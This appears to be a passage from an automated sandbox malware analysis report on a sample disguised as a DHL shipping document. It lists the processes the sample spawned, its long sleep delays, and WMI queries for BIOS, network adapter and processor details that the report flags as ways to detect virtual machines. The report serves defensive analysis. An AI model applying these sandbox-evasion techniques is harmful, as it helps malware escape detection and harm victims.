                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exe TID: 5268Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exe TID: 5268Thread sleep count: 48 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exe TID: 5248Thread sleep count: 9575 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4604Thread sleep count: 9332 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1244Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 1844Thread sleep count: 9713 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99839s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99733s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99621s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99486s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99230s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99119s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99014s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98894s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98750s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98631s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98511s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98402s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98292s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98171s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98059s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97950s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97835s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97714s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97591s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97482s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97359s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97244s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97140s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97031s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99825s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99711s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99559s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99424s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99297s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99186s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99078s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98968s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98851s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98720s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98527s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98414s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98311s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98200s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98089s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97964s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97851s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97734s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97593s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97462s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 5840Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 5840Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 5912Thread sleep count: 9667 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 5492Thread sleep count: 4987 > 30
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99868s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99734s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99621s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99514s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99398s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99282s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99167s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99036s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98792s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98538s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98420s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98310s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98094s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97976s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97853s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97732s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97508s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97264s >= -30000s
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 5104Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 2220Thread sleep count: 6320 > 30
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1176Thread sleep count: 499 > 30
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeWindow / User API: threadDelayed 9575Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9389Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9332Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWindow / User API: threadDelayed 9713Jump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeWindow / User API: threadDelayed 9667Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWindow / User API: threadDelayed 4987
                  Source: C:\Users\user\AppData\Local\explorers.exeWindow / User API: threadDelayed 6320
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWindow / User API: threadDelayed 499
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99839Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99733Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99621Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99486Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99344Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99230Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99119Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99014Jump to behavior
